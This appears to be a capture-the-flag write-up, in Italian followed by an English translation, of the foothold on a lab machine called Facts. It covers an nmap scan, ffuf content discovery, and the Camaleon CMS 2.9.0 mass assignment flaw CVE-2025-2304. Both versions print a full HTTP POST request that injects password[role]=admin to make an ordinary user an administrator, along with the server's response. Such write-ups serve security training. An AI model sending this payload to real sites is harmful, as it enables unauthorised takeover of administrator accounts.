Facts
Foothold
Si lancia nmap su porte TCP, solo le porte 80 e 22 sono aperte. Attraverso le informazioni recuperate, si mappa l’ip con facts.htb
sudo nmap -Pn -sV -p 80 --disable-arp-ping 10.129.2.129
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 11:38 +0100
Nmap scan report for facts.htb (10.129.2.129)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.26.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
Facendo del content discovery con ffuf, si trova l’accesso ad una pagina di login admin.php
Si provano delle credenziali di default, ma successivamente si crea un account e si entra con tale.
Leggendo la versione del CMS nella pagina web (Camaleon CMS 2.9.0), è possibile trovare una vulnerabilità di mass assignment nota come CVE-2025-2304.
Questo permette a un account autenticato di diventare amministratore della pagina, sfruttando una falla nel metodo updated_ajax del controller Users di Ruby on Rails. In particolare, durante una richiesta POST a /admin/users/[id]/updated_ajax con payload come password[role]=admin, il codice params.require(:password).permit! accetta tutti i parametri senza filtri, permettendo l’elevazione dei privilegi dell’utente.
La PoC viene presentata qui
Pertanto modificando al richiesta POST
Richiesta
POST /admin/users/5/updated_ajax HTTP/1.1
Host: facts.htb
Content-Length: 215
X-CSRF-Token: uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://facts.htb
Referer: http://facts.htb/admin/profile/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth_token=AsjI8c7Btp9M9GyHgbAsWw&Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36&10.10.14.185; _factsapp_session=Qz87P6ozb8TT3dlGH72X2o%2BNW%2FDhO%2Fy1pblbTFUvovYTx6IHCSgJ7rAFtA56%2FW5IZjZP7WdbUvFGXjbzENX2327UQ6gCdTU0zfErlJycxK8mtjapWY5Tj%2FTco4A6FPNzpgMxVd1V22vMAPPbIqWr7y1lV1fhAPD7F4SCRlr3LJRKqKBY7fBgyW4JsI83wY0jZYuc4S58Art5drmcFPv7GLnIokio8OzQb4fG2jEbZdskAx8EVC3vm7bks7%2BmkCJILeTds46pW6Xdc29EUjpA66M%2FtSlS%2BEkX1ebq0Rj%2FaYooLf5n6O6P6oPT27JUfhaFdtpknArq3ZphxYtH75u0vWIXJlt1g17MmvxUSWlFojRIo%2BHJBztpBypl%2FSK0Qoqurg%3D%3D--ASzpDvwEXqglF65U--1fCde4XKtMlMrbOihZz7lA%3D%3D
Connection: keep-alive
_method=patch&authenticity_token=uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg&password%5Bpassword%5D=test123&password%5Bpassword_confirmation%5D=test123&password[role]=admin
Risposta
HTTP/1.1 200 OK
Server: nginx/1.26.3 (Ubuntu)
Date: Sun, 22 Feb 2026 10:51:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-frame-options: SAMEORIGIN
x-xss-protection: 0
x-content-type-options: nosniff
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
vary: Accept
cache-control: no-cache
set-cookie: auth_token=V-fTeIkzuHtobNG_CTdSHw%26Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36%2610.10.14.185; path=/; samesite=lax
set-cookie: _factsapp_session=tJF4oakEgaVPks4OcPH8Wk%2FIN5ofE5%2FheMS9N%2BhrSlYvJ12h7EBgRfPquCu3wrDszviBCJgJGJ7OFgurQofD%2BpWLgZdIPjguM2eQDgi3AAZevFaLxfA7KoUmQoTeXrz88mQiYcE0PrrGRk05Pip8fdnkDyRGfhtptFxB49RysEiuDt2Xlgycoui%2FdYPEkcJJMzd8Lf7QDqGl8FeuuD46Lyil5K%2FxYNb5K84DHDnJIsSB25He7P24Sit%2BjNbO17M2BwRUZGzijl623kePEs%2FztzqEXVpTlcAbqlUE8gxPCXYZG3NGn8fljgM%2FolmbkkFqMhPHYPRkpf4PcpS41hgae4ht9UlVOK1UeUcQwavpzbHbeDRKj7mEEkfi4PfKrPEdpA%3D%3D--J18Uc84bzVBns9FK--6YKxJZMD%2F3P8%2FAVyCs%2BLUw%3D%3D; path=/; httponly; samesite=lax
x-request-id: c667a4e3-73d5-49cf-8b80-904e01ebb055
x-runtime: 0.360213
Vengono abilitate differenti funzioni dopo aver fatto la modifica
Foothold
We run nmap against TCP ports; only ports 80 and 22 are open. Using the information gathered, we map the IP to facts.htb
sudo nmap -Pn -sV -p 80 --disable-arp-ping 10.129.2.129
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 11:38 +0100
Nmap scan report for facts.htb (10.129.2.129)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.26.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
Doing some content discovery with ffuf, we find access to an admin.php login page
We try some default credentials, but then we create an account and log in with it.
Reading the CMS version on the web page (Camaleon CMS 2.9.0), we can find a mass assignment vulnerability known as CVE-2025-2304.
This allows an authenticated account to become administrator of the site by exploiting a flaw in the updated_ajax method of the Ruby on Rails Users controller. Specifically, during a POST request to /admin/users/[id]/updated_ajax with a payload such as password[role]=admin, the code params.require(:password).permit! accepts all parameters without filtering, allowing privilege escalation for the user.
The PoC is presented here
Therefore, by modifying the POST request
Request
POST /admin/users/5/updated_ajax HTTP/1.1
Host: facts.htb
Content-Length: 215
X-CSRF-Token: uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://facts.htb
Referer: http://facts.htb/admin/profile/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth_token=AsjI8c7Btp9M9GyHgbAsWw&Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36&10.10.14.185; _factsapp_session=Qz87P6ozb8TT3dlGH72X2o%2BNW%2FDhO%2Fy1pblbTFUvovYTx6IHCSgJ7rAFtA56%2FW5IZjZP7WdbUvFGXjbzENX2327UQ6gCdTU0zfErlJycxK8mtjapWY5Tj%2FTco4A6FPNzpgMxVd1V22vMAPPbIqWr7y1lV1fhAPD7F4SCRlr3LJRKqKBY7fBgyW4JsI83wY0jZYuc4S58Art5drmcFPv7GLnIokio8OzQb4fG2jEbZdskAx8EVC3vm7bks7%2BmkCJILeTds46pW6Xdc29EUjpA66M%2FtSlS%2BEkX1ebq0Rj%2FaYooLf5n6O6P6oPT27JUfhaFdtpknArq3ZphxYtH75u0vWIXJlt1g17MmvxUSWlFojRIo%2BHJBztpBypl%2FSK0Qoqurg%3D%3D--ASzpDvwEXqglF65U--1fCde4XKtMlMrbOihZz7lA%3D%3D
Connection: keep-alive
_method=patch&authenticity_token=uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg&password%5Bpassword%5D=test123&password%5Bpassword_confirmation%5D=test123&password[role]=admin
Response
HTTP/1.1 200 OK
Server: nginx/1.26.3 (Ubuntu)
Date: Sun, 22 Feb 2026 10:51:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-frame-options: SAMEORIGIN
x-xss-protection: 0
x-content-type-options: nosniff
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
vary: Accept
cache-control: no-cache
set-cookie: auth_token=V-fTeIkzuHtobNG_CTdSHw%26Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36%2610.10.14.185; path=/; samesite=lax
set-cookie: _factsapp_session=tJF4oakEgaVPks4OcPH8Wk%2FIN5ofE5%2FheMS9N%2BhrSlYvJ12h7EBgRfPquCu3wrDszviBCJgJGJ7OFgurQofD%2BpWLgZdIPjguM2eQDgi3AAZevFaLxfA7KoUmQoTeXrz88mQiYcE0PrrGRk05Pip8fdnkDyRGfhtptFxB49RysEiuDt2Xlgycoui%2FdYPEkcJJMzd8Lf7QDqGl8FeuuD46Lyil5K%2FxYNb5K84DHDnJIsSB25He7P24Sit%2BjNbO17M2BwRUZGzijl623kePEs%2FztzqEXVpTlcAbqlUE8gxPCXYZG3NGn8fljgM%2FolmbkkFqMhPHYPRkpf4PcpS41hgae4ht9UlVOK1UeUcQwavpzbHbeDRKj7mEEkfi4PfKrPEdpA%3D%3D--J18Uc84bzVBns9FK--6YKxJZMD%2F3P8%2FAVyCs%2BLUw%3D%3D; path=/; httponly; samesite=lax
x-request-id: c667a4e3-73d5-49cf-8b80-904e01ebb055
x-runtime: 0.360213
Several functions are enabled after making the change